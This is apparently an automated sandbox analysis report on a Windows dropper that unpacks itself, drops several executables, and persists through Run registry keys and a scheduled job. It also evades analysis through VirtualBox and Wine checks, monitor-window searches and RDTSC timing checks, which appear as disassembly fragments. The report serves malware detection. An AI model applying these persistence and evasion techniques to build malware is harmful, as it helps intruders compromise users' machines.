Source: Window Recorder Window detected: More than 3 window changes detected
Source: xwZfYpo16i.exe Static file information: File size 1906688 > 1048576
Source: xwZfYpo16i.exe Static PE information: Raw size of pdwvfcxw is bigger than: 0x100000 < 0x19fe00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Unpacked PE file: 0.2.xwZfYpo16i.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pdwvfcxw:EW;bgplyofn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pdwvfcxw:EW;bgplyofn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pdwvfcxw:EW;bgplyofn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pdwvfcxw:EW;bgplyofn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pdwvfcxw:EW;bgplyofn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pdwvfcxw:EW;bgplyofn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Unpacked PE file: 25.2.4db5303091.exe.2e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wdneehld:EW;hxgpzqkm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wdneehld:EW;hxgpzqkm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Unpacked PE file: 54.2.4db5303091.exe.2e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wdneehld:EW;hxgpzqkm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wdneehld:EW;hxgpzqkm:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00E442DE
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: num.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: 4db5303091.exe.6.dr Static PE information: real checksum: 0x1d65ad should be: 0x1dbb25
Source: xwZfYpo16i.exe Static PE information: real checksum: 0x1dbf04 should be: 0x1d242f
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1dbf04 should be: 0x1d242f
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1d65ad should be: 0x1dbb25
Source: num[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
PE file contains sections with non-standard names
Source: xwZfYpo16i.exe Static PE information: section name:
Source: xwZfYpo16i.exe Static PE information: section name: .idata
Source: xwZfYpo16i.exe Static PE information: section name:
Source: xwZfYpo16i.exe Static PE information: section name: pdwvfcxw
Source: xwZfYpo16i.exe Static PE information: section name: bgplyofn
Source: xwZfYpo16i.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: pdwvfcxw
Source: skotes.exe.0.dr Static PE information: section name: bgplyofn
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: wdneehld
Source: random[1].exe0.6.dr Static PE information: section name: hxgpzqkm
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 4db5303091.exe.6.dr Static PE information: section name:
Source: 4db5303091.exe.6.dr Static PE information: section name: .rsrc
Source: 4db5303091.exe.6.dr Static PE information: section name: .idata
Source: 4db5303091.exe.6.dr Static PE information: section name:
Source: 4db5303091.exe.6.dr Static PE information: section name: wdneehld
Source: 4db5303091.exe.6.dr Static PE information: section name: hxgpzqkm
Source: 4db5303091.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E60A76 push ecx; ret 7_2_00E60A89
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0065B035 push ecx; ret 22_2_0065B048
Source: xwZfYpo16i.exe Static PE information: section name: entropy: 7.984491031555736
Source: xwZfYpo16i.exe Static PE information: section name: pdwvfcxw entropy: 7.954151445076012
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.984491031555736
Source: skotes.exe.0.dr Static PE information: section name: pdwvfcxw entropy: 7.954151445076012
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.971591809735686
Source: random[1].exe0.6.dr Static PE information: section name: wdneehld entropy: 7.953411071774829
Source: 4db5303091.exe.6.dr Static PE information: section name: entropy: 7.971591809735686
Source: 4db5303091.exe.6.dr Static PE information: section name: wdneehld entropy: 7.953411071774829
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cb428cafc9.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4db5303091.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cb428cafc9.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cb428cafc9.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4db5303091.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4db5303091.exe Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E5F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 7_2_00E5F98E
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00ED1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 7_2_00ED1C41
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00659860
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40D3EE second address: 40D3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40D3F2 second address: 40D3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40D3FD second address: 40D418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F65166h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40D8AE second address: 40D8BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6BF4B2C35Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40DBC5 second address: 40DBE9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6BF4F65168h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40DBE9 second address: 40DBED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40DBED second address: 40DBFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40DD68 second address: 40DD95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C363h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6BF4B2C35Ah 0x00000010 jl 00007F6BF4B2C37Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40DD95 second address: 40DD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 40DD9B second address: 40DD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410AC7 second address: 410ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410ACB second address: 410AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F6BF4B2C35Bh 0x0000000c nop 0x0000000d cmc 0x0000000e push 00000000h 0x00000010 mov dl, 81h 0x00000012 push 7F5B144Bh 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jl 00007F6BF4B2C356h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007F6BF4B2C356h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410AFB second address: 410B4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7F5B14CBh 0x0000000e mov edx, dword ptr [ebp+122D1BB0h] 0x00000014 push 00000003h 0x00000016 call 00007F6BF4F65165h 0x0000001b mov dword ptr [ebp+122D34FBh], esi 0x00000021 pop edi 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D27B8h], ecx 0x0000002a push ecx 0x0000002b mov dword ptr [ebp+122D1B35h], eax 0x00000031 pop esi 0x00000032 push 00000003h 0x00000034 mov dx, bx 0x00000037 push 5A486015h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push esi 0x00000042 pop esi 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410B4F second address: 410B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6BF4B2C35Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 65B79FEBh 0x00000014 mov dword ptr [ebp+122D23FBh], eax 0x0000001a lea ebx, dword ptr [ebp+124559A9h] 0x00000020 sub esi, dword ptr [ebp+122D3803h] 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6BF4B2C35Dh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410CF7 second address: 410CFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410CFD second address: 410D2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jl 00007F6BF4B2C356h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6BF4B2C360h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410D2C second address: 410D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410D83 second address: 410DA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 410DA8 second address: 410DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 3FC3E3 second address: 3FC401 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6BF4B2C363h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F005 second address: 42F038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6BF4F6515Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F6BF4F65167h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 42F15B second address: 42F15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
